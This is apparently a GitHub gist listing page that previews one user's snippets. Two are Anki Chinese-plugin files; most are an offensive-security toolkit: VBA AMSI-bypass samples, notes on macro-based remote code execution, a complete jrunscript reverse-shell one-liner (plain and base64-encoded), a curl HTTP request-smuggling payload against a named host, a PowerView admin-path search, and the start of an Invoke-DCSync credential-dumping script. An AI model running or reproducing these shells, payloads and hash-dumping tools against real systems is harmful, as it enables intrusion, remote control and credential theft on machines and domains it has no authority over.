Skip to content

Instantly share code, notes, and snippets.

View joeminicucci's full-sized avatar

m1n1 joeminicucci

43 followers · 58 following
View GitHub Profile
@joeminicucci
joeminicucci / dictdb.py
Last active August 29, 2015 14:10
chinese plugin mods
# -*- coding: utf-8 -*-
#
# Copyright © 2014 Thomas TEMPÉ, <thomas.tempe@alysse.org>
#
# License: GNU GPL, version 3 or later; http://www.gnu.org/copyleft/gpl.html
#
#COPYRIGHT AND PERMISSION NOTICE
#Copyright © 1991-2012 Unicode, Inc. All rights reserved. Distributed under the Terms of Use in http://www.unicode.org/copyright.html.
@joeminicucci
joeminicucci / fill_missing.py
Created December 6, 2014 11:47
autofill (chinese support)
# -*- coding: utf-8 -*-
#
# Copyright © 2013 Chris Hatch, <foonugget@gmail.com>
#
# License: GNU GPL, version 3 or later; http://www.gnu.org/copyleft/gpl.html
#
from aqt.utils import showInfo
from anki.find import Finder
from edit_behavior_model import *
@joeminicucci
joeminicucci / gist:7dd5190dc31c43c518abb489ec77903d
Created September 8, 2019 04:12
VBA AMSI Bypasses (from outflanknl)
'##################################################################################
' Code samples for AMSI bypass techniques
' relating to the blogpost on AMSI bypasses on https://outflank.nl/blog/
'##################################################################################
' ##################################################################################
' AMSI Bypass approach that abuses trusted locations (sample for Word)
' ##################################################################################
@joeminicucci
joeminicucci / Various-Macro-Based-RCEs.md
Created September 8, 2019 04:21 — forked from mgeeky/Various-Macro-Based-RCEs.md
Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine.

This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.

All of the below examples had been generated for using as a remote address: 192.168.56.101.

List:

  1. Page substiution macro for luring user to click Enable Content
  2. The Unicorn Powershell based payload
@joeminicucci
joeminicucci / simple-https-server.py
Created September 16, 2019 18:29 — forked from dergachev/simple-https-server.py
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
# python simple-https-server.py
# then in your browser, visit:
# https://localhost:4443
import BaseHTTPServer, SimpleHTTPServer
import ssl
@joeminicucci
joeminicucci / JVM_Post_Xploit.md
Created November 5, 2019 17:40

Nashorn / Rhino:

  • Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
  • Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
@joeminicucci
joeminicucci / custom_smuggling_payloads.sh
Created November 6, 2019 21:45
#CL:TE -- Standard CL and TE
curl -i -s -k -X $'POST' \
-H $'Host: subdomain1.joe.pr.qing-wen.com/' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: keep-alive' -H $'Upgrade-Insecure-Requests: 1' -H $'Cache-Control: max-age=0' -H $'Content-Length: 382' -H $'Transfer-Encoding: chunked' \
--data-binary $'172\x0d\x0aPOST /def HTTP/1.1\x0d\x0aHost: subdomain1.joe.pr.qing-wen.com/\x0d\x0aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0\x0d\x0aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\x0d\x0aAccept-Language: en-US,en;q=0.5\x0d\x0aAccept-Encoding: gzip, deflate\x0d\x0aConnection: keep-alive\x0d\x0aUpgrade-Insecure-Requests: 1\x0d\x0aCache-Control: max-age=0\x0d\x0a0\x0d\x0a\x0d\x0a' \
$'https://subdomain1.j
@joeminicucci
joeminicucci / DerivativeAdmin.ps1
Created November 10, 2019 07:56
Derivative Admin search using PowerView with Dijkstra's algorithm
# From https://wald0.com/?p=14
# Requires PowerView
$Graph = @()
$Infinity = [int]::MaxValue
$Nodes = Get-NetUser | ForEach-Object { $_.samaccountname }
$Nodes += Get-NetComputer
ForEach($Node in $Nodes){
$Vertex = New-Object PSObject
@joeminicucci
joeminicucci / Invoke-DCSync.ps1
Created January 23, 2020 02:30 — forked from monoxgas/Invoke-DCSync.ps1
What more could you want?
This file has been truncated, but you can view the full file.
function Invoke-DCSync
{
<#
.SYNOPSIS
Uses dcsync from mimikatz to collect NTLM hashes from the domain.
Author: @monoxgas
Improved by: @harmj0y
@joeminicucci
joeminicucci / BloodhoundCheatSheet.md
Created February 13, 2020 05:54
DogWhisperer - BloodHound Cypher Cheat Sheet (v2)